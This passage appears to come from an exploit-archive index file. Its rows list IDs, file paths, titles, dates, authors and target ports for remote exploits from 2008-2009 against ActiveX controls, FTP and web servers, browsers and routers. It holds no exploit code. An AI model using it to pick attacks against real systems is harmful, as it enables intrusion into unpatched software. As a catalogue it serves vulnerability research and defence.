Overflow",2008-12-29,callAX,windows,remote, -7623,exploits/windows/remote/7623.html,"Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection",2008-12-30,Nine:Situations:Group,windows,remote, -7630,exploits/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,windows,remote, -7701,exploits/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,linux,remote,445 -7706,exploits/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,windows,remote, -7712,exploits/hardware/remote/7712.txt,"NETGEAR WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote, -7739,exploits/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method",2009-01-12,"Alfons Luja",windows,remote, -7747,exploits/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote, -7748,exploits/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote, -7749,exploits/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote Command Execution",2009-01-13,Houssamix,windows,remote, -7755,exploits/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote Command Execution",2009-01-13,Cyber-Zone,windows,remote, -7757,exploits/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote Command Execution",2009-01-13,Stack,windows,remote, -7760,exploits/multiple/remote/7760.php,"TeamSpeak 2.0.23.17 - Remote File Disclosure",2009-01-14,c411k,multiple,remote, -7762,exploits/windows/remote/7762.html,"EDraw Office Viewer 5.4 - 'HttpDownloadFile()' Insecure Method",2009-01-14,Cyber-Zone,windows,remote, -7763,exploits/windows/remote/7763.html,"Excel Viewer OCX 3.2 - Remote Command Execution",2009-01-14,Stack,windows,remote, -7779,exploits/windows/remote/7779.html,"AAA EasyGrid ActiveX 3.51 - Remote File Overwrite",2009-01-14,Houssamix,windows,remote, -7781,exploits/multiple/remote/7781.txt,"Oracle Secure Backup 10g - 'exec_qr()' Command Injection",2009-01-14,"Joxean Koret",multiple,remote, -7794,exploits/windows/remote/7794.html,"Ciansoft PDFBuilderX 2.2 - ActiveX Arbitrary File Overwrite",2009-01-15,"Alfons Luja",windows,remote, -7804,exploits/windows/remote/7804.html,"MetaProducts MetaTreeX 1.5.100 - ActiveX File Overwrite",2009-01-16,Houssamix,windows,remote, -7826,exploits/windows/remote/7826.html,"SmartVmd ActiveX 1.1 - Remote File Overwrite",2009-01-19,Houssamix,windows,remote, -7827,exploits/windows/remote/7827.html,"SmartVmd ActiveX 1.1 - Remote File Deletion",2009-01-19,Houssamix,windows,remote, -7842,exploits/windows/remote/7842.html,"Mozilla Firefox 3.0.5 - Status Bar Obfuscation / Clickjacking",2009-01-21,MrDoug,windows,remote, -7845,exploits/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation / Cross-Site Scripting",2009-01-21,DSecRG,hardware,remote, -7858,exploits/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,hardware,remote, -7868,exploits/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 - Remote File Overwrite",2009-01-26,Houssamix,windows,remote, -7871,exploits/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 - Insecure Method File Creation",2009-01-26,Stack,windows,remote, -7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21 -7903,exploits/windows/remote/7903.html,"Google Chrome 1.0.154.43 - Clickjacking",2009-01-28,x0x,windows,remote, -7910,exploits/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote, -7912,exploits/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,windows,remote, -7913,exploits/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow",2009-01-29,SkD,windows,remote,21 -7915,exploits/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting",2009-01-29,"Usman Saeed",hardware,remote, -7918,exploits/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote, -7919,exploits/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote, -7920,exploits/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter - Cross-Site Scripting / Cross-Site Request Forgery Remote Firmware Overwrite",2009-01-29,"Michael Brooks",hardware,remote, -7921,exploits/hardware/remote/7921.txt,"Zoom VoIP Phone Adapater ATA1+1 1.2.5 - Cross-Site Request Forgery",2009-01-29,"Michael Brooks",hardware,remote, -7926,exploits/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote Overwrite (SEH)",2009-01-30,LiquidWorm,windows,remote, -7928,exploits/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null Byte File Overwrite",2009-01-30,DSecRG,windows,remote, -7935,exploits/windows/remote/7935.html,"Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection (PoC)",2009-01-30,waraxe,windows,remote, -7966,exploits/windows/remote/7966.txt,"NaviCOPA Web Server 3.0.1 - Remote Buffer Overflow / Script Source Disclosure",2009-02-03,e.wiZz!,windows,remote, -7988,exploits/windows/remote/7988.pl,"Amaya Web Browser 11 (Windows XP) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",windows,remote, -7989,exploits/windows/remote/7989.pl,"Amaya Web Browser 11 (Windows Vista) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",windows,remote, -8022,exploits/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,hardware,remote, -8023,exploits/hardware/remote/8023.txt,"ZeroShell 1.0beta11 - Remote Code Execution",2009-02-09,ikki,hardware,remote, -8037,exploits/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,multiple,remote, -8041,exploits/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",windows,remote, -8059,exploits/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote, -8079,exploits/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,windows,remote, -8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote, -8082,exploits/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)",2009-02-20,webDEViL,windows,remote, -8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",hardware,remote, -8097,exploits/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote, -8117,exploits/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote, -8118,exploits/windows/remote/8118.html,"Orbit Downloader 2.8.4 - 'Hostname' Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote, -8142,exploits/windows/remote/8142.py,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80 -8143,exploits/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution",2009-03-03,Nine:Situations:Group,windows,remote, -8144,exploits/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,windows,remote, -8149,exploits/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote, -8152,exploits/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote, -8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80 -8155,exploits/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,windows,remote, -8160,exploits/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,windows,remote, -8173,exploits/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,windows,remote, -8191,exploits/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 - XML Injection",2009-03-10,"SEC Consult",multiple,remote, -8200,exploits/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 - Remote Delete Files",2009-03-10,"Jonathan Salwan",windows,remote, -8203,exploits/windows/remote/8203.pl,"POP Peeper 3.4.0.0 - Date Remote Buffer Overflow",2009-03-12,"Jeremy Brown",windows,remote, -8206,exploits/windows/remote/8206.html,"GeoVision LiveAudio - ActiveX Remote Freed-Memory Access",2009-03-13,Nine:Situations:Group,windows,remote, -8208,exploits/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - 'MrvBarCd.dll' Insecure Method",2009-03-13,Cyber-Zone,windows,remote, -8211,exploits/windows/remote/8211.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories",2009-03-16,"Jonathan Salwan",windows,remote, -8215,exploits/windows/remote/8215.txt,"PPLive 1.9.21 - '/LoadModule' URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote, -8227,exploits/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow (SEH)",2009-03-17,LiquidWorm,windows,remote, -8248,exploits/windows/remote/8248.py,"POP Peeper 3.4.0.0 - 'From' Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote, -8253,exploits/windows/remote/8253.c,"Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow",2009-03-20,"fl0 fl0w",windows,remote, -8256,exploits/windows/remote/8256.c,"Sysax Multi Server 4.3 - Arbitrary Delete Files Expoit",2009-03-23,"Jonathan Salwan",windows,remote, -8257,exploits/windows/remote/8257.txt,"Orbit Downloader 2.8.7 - Arbitrary File Deletion",2009-03-23,waraxe,windows,remote, -8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote, -8273,exploits/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Multiple Authenticated Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote, -8283,exploits/windows/remote/8283.c,"Femitter FTP Server 1.x - Multiple Authenticated Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote, -8284,exploits/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution",2009-03-24,"Bui Quang Minh",windows,remote, -8295,exploits/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22 -8316,exploits/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote, -8321,exploits/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser 'defer' Remote Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote, -8332,exploits/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote, -8336,exploits/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow",2009-04-01,"Guido Landi",windows,remote, -8338,exploits/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 -8339,exploits/windows/remote/8339.py,"XBMC 8.10 - 'takescreenshot' Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 -8340,exploits/windows/remote/8340.py,"XBMC 8.10 - Get Tag From File Name Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 -8354,exploits/windows/remote/8354.py,"XBMC 8.10 - GET Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80 -8359,exploits/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router - WPA2PSK Default Algorithm",2009-04-06,j0rgan,hardware,remote, -8363,exploits/windows/remote/8363.py,"XBMC 8.10 - 'HEAD' Remote Buffer Overflow (SEH)",2009-04-07,His0k4,windows,remote,80 -8368,exploits/windows/remote/8368.txt,"peterConnects Web Server - Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote, -8384,exploits/linux/remote/8384.txt,"net2ftp 0.97 - Cross-Site Scripting / Request Forgery",2009-04-09,cicatriz,linux,remote, -8392,exploits/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-Server - Directory Traversal",2009-04-10,DSecRG,windows,remote, -8398,exploits/windows/remote/8398.php,"FTPDMIN 0.96 (Windows XP SP3) - 'RNFR' Remote Buffer Overflow",2009-04-13,surfista,windows,remote,21 -8419,exploits/windows/remote/8419.pl,"FTPDMIN 0.96 - Arbitrary File Disclosure",2009-04-13,Stack,windows,remote,21 -8421,exploits/windows/remote/8421.py,"Steamcast - HTTP Request Remote Buffer Overflow (SEH) (1)",2009-04-13,His0k4,windows,remote,8000 -8422,exploits/windows/remote/8422.py,"Steamcast - HTTP Request Remote Buffer Overflow (SEH) (2)",2009-04-13,His0k4,windows,remote,8000 -8428,exploits/windows/remote/8428.txt,"MonGoose 2.4 (Windows) - WebServer Directory Traversal",2009-04-14,e.wiZz!,windows,remote, -8458,exploits/multiple/remote/8458.txt,"Apache Geronimo 2.1.3 - Multiple Directory Traversal Vulnerabilities",2009-04-16,DSecRG,multiple,remote, -8463,exploits/windows/remote/8463.txt,"Zervit Web Server 0.02 - Directory Traversal",2009-04-16,e.wiZz!,windows,remote, -8518,exploits/windows/remote/8518.pl,"Femitter FTP Server 1.03 - Arbitrary File Disclosure",2009-04-22,Stack,windows,remote, -8525,exploits/windows/remote/8525.pl,"BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote, -8537,exploits/windows/remote/8537.txt,"dwebpro 6.8.26 - Directory Traversal / File Disclosure",2009-04-27,"Alfons Luja",windows,remote, -8554,exploits/windows/remote/8554.py,"Belkin Bulldog Plus - HTTP Server Remote Buffer Overflow",2009-04-27,His0k4,windows,remote,80 -8556,exploits/linux/remote/8556.c,"Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow",2009-04-28,sgrakkyu,linux,remote, -8560,exploits/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution",2009-04-28,Elazar,windows,remote, -8561,exploits/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure",2009-04-28,Cyber-Zone,windows,remote, -8562,exploits/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow",2009-04-29,Nine:Situations:Group,windows,remote, -8564,exploits/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 - Arbitrary File Disclosure",2009-04-29,ZoRLu,windows,remote, -8569,exploits/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - 'GetAnnots()' Remote Code Execution",2009-04-29,Arr1val,linux,remote, -8570,exploits/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - 'customDictionaryOpen()' Code Execution",2009-04-29,Arr1val,linux,remote, -8579,exploits/windows/remote/8579.html,"BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow",2009-04-30,MITBOY,windows,remote, -8613,exploits/win_x86/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote, -8614,exploits/win_x86/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote, -8621,exploits/win_x86/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,win_x86,remote, -8623,exploits/win_x86/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,win_x86,remote, -8651,exploits/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,windows,remote, -8666,exploits/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote, -8696,exploits/hardware/remote/8696.txt,"D-Link - Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote, -8704,exploits/windows/remote/8704.txt,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)",2009-05-15,kingcope,windows,remote, -8716,exploits/windows/remote/8716.py,"httpdx 0.5b - FTP Server (USER) Remote Buffer Overflow (SEH)",2009-05-18,His0k4,windows,remote,21 -8732,exploits/windows/remote/8732.py,"httpdx 0.5b - FTP Server (CWD) Remote Buffer Overflow (SEH)",2009-05-19,His0k4,windows,remote,21 -8733,exploits/windows/remote/8733.html,"AOL IWinAmpActiveX Class - 'ConvertFile()' Remote Buffer Overflow",2009-05-19,rgod,windows,remote, -8742,exploits/windows/remote/8742.txt,"KingSoft Web Shield 1.1.0.62 - Cross-Site Scripting / Code Execution",2009-05-19,inking,windows,remote, -8753,exploits/osx/remote/8753.txt,"Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2)",2009-05-20,"Landon Fuller",osx,remote, -8754,exploits/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote, -8757,exploits/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,windows,remote, -8758,exploits/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution",2009-05-21,etirah,windows,remote, -8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)",2009-05-22,racle,windows,remote, -8786,exploits/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,multiple,remote, -8804,exploits/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow (SEH)",2009-05-26,His0k4,windows,remote,2242 -8806,exploits/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)",2009-05-26,ka0x,windows,remote, -8824,exploits/windows/remote/8824.html,"Roxio CinePlayer 3.2 - 'SonicMediaPlayer.dll' Remote Buffer Overflow",2009-05-29,snakespc,windows,remote, -8835,exploits/windows/remote/8835.html,"Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow HeapSpray",2009-06-01,His0k4,windows,remote, -8846,exploits/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,hardware,remote, -8861,exploits/osx/remote/8861.rb,"Apple iTunes 8.1.1 - 'ITMS' Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",osx,remote, -8880,exploits/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,linux,remote, -8897,exploits/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files",2009-06-08,"Jonathan Salwan",windows,remote, -8907,exploits/multiple/remote/8907.txt,"Apple Safari 3.2.x - 'XXE' Local File Theft",2009-06-09,"Chris Evans",multiple,remote, -8916,exploits/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - Control Server Remote Buffer Overflow",2009-06-09,His0k4,windows,remote,80 -8922,exploits/windows/remote/8922.txt,"Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote, -8930,exploits/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",windows,remote, -8934,exploits/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - 'itms/itcp' Remote Buffer Overflow",2009-06-12,ryujin,windows,remote, -8938,exploits/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - 'URL' Remote Buffer Overflow",2009-06-12,seer[N.N.U],windows,remote, -8963,exploits/hardware/remote/8963.txt,"NETGEAR DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote, -8969,exploits/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,windows,remote, -8970,exploits/windows/remote/8970.txt,"McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write",2009-06-16,callAX,windows,remote, -8986,exploits/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote, -9002,exploits/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 - Remote SYSTEM",2009-06-22,mu-b,windows,remote,19810 -9031,exploits/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)",2009-06-29,His0k4,windows,remote,19810 -9039,exploits/multiple/remote/9039.txt,"cPanel - Authenticated 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote, -9065,exploits/windows/remote/9065.c,"Green Dam - Remote Change System Time",2009-07-01,"Anti GD",windows,remote, -9066,exploits/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure",2009-07-01,Septemb0x,hardware,remote, -9093,exploits/windows/remote/9093.txt,"Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote, -9096,exploits/windows/remote/9096.txt,"Sun One WebServer 6.1 - .JSP Source Viewing",2009-07-09,kingcope,windows,remote, -9106,exploits/windows/remote/9106.txt,"citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution",2009-07-10,"Secure Network",windows,remote, -9108,exploits/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote, -9117,exploits/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",hardware,remote, -9128,exploits/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,windows,remote, -9137,exploits/windows/remote/9137.html,"Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow",2009-07-13,Sberry,windows,remote, -9143,exploits/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local/Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote, -9181,exploits/windows/remote/9181.py,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote, -9209,exploits/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote, -9214,exploits/windows/remote/9214.pl,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)",2009-07-20,netsoul,windows,remote, -9224,exploits/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Remote Overflow",2009-07-21,"Ahmed Obied",windows,remote, -9247,exploits/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - Font Tags Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote, -9278,exploits/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote, -9303,exploits/windows/remote/9303.c,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow",2009-07-30,"Pankaj Kohli",windows,remote, -9318,exploits/windows/remote/9318.py,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow",2009-07-31,His0k4,windows,remote, -9319,exploits/windows/remote/9319.py,"SAP Business One 2005-A License Manager - Remote Buffer Overflow",2009-08-01,Bruk0ut,windows,remote,30000 -9330,exploits/windows/remote/9330.py,"Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,windows,remote, -9422,exploits/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (1)",2009-08-12,hkm,hardware,remote, -9432,exploits/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Disclosure",2009-08-13,"aBo MoHaMeD",hardware,remote, -9443,exploits/windows/remote/9443.txt,"Adobe JRun 4 - 'logfile' Authenticated Directory Traversal",2009-08-18,DSecRG,windows,remote, -9456,exploits/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,hardware,remote, -9468,exploits/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69 -9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote, -9498,exploits/hardware/remote/9498.txt,"NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",hardware,remote, -9500,exploits/windows/remote/9500.cpp,"NaviCOPA Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,windows,remote, -9503,exploits/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote, -9508,exploits/windows/remote/9508.rb,"ProFTP 2.9 - Welcome Message Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,windows,remote, -9541,exploits/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow",2009-08-31,kingcope,windows,remote,21 -9559,exploits/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow",2009-09-01,muts,windows,remote,21 -9586,exploits/windows/remote/9586.py,"SIDVault 2.0e - Windows Remote Buffer Overflow",2009-09-03,blake,windows,remote,389 -9592,exploits/windows/remote/9592.rb,"SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)",2009-09-04,His0k4,windows,remote,389 -9596,exploits/windows/remote/9596.py,"SIDVault 2.0e - Windows Universal Buffer Overflow (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389 -9613,exploits/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow (Universal)",2009-09-09,His0k4,windows,remote, -9615,exploits/windows/remote/9615.jar,"Pidgin MSN 2.5.8 - Remote Code Execution",2009-09-09,"Pierre Nogues",windows,remote, -9638,exploits/windows/remote/9638.txt,"Kolibri+ Web Server 2 - Source Code Disclosure",2009-09-11,SkuLL-HackeR,windows,remote, -9643,exploits/windows/remote/9643.txt,"kolibri+ Web Server 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote, -9644,exploits/windows/remote/9644.py,"Kolibri+ Web Server 2 - GET Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80 -9649,exploits/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure",2009-09-11,Dr_IDE,windows,remote, -9650,exploits/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote, -9651,exploits/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 - Multiplatform Remote Code Execution via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote, -9652,exploits/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass / Remote Code Injection",2009-09-14,ikki,windows,remote,80 -9658,exploits/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",hardware,remote, -9660,exploits/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",windows,remote, -9662,exploits/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143 -9663,exploits/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote, -9673,exploits/windows/remote/9673.py,"BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660 -9676,exploits/windows/remote/9676.txt,"BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass",2009-09-15,"Usman 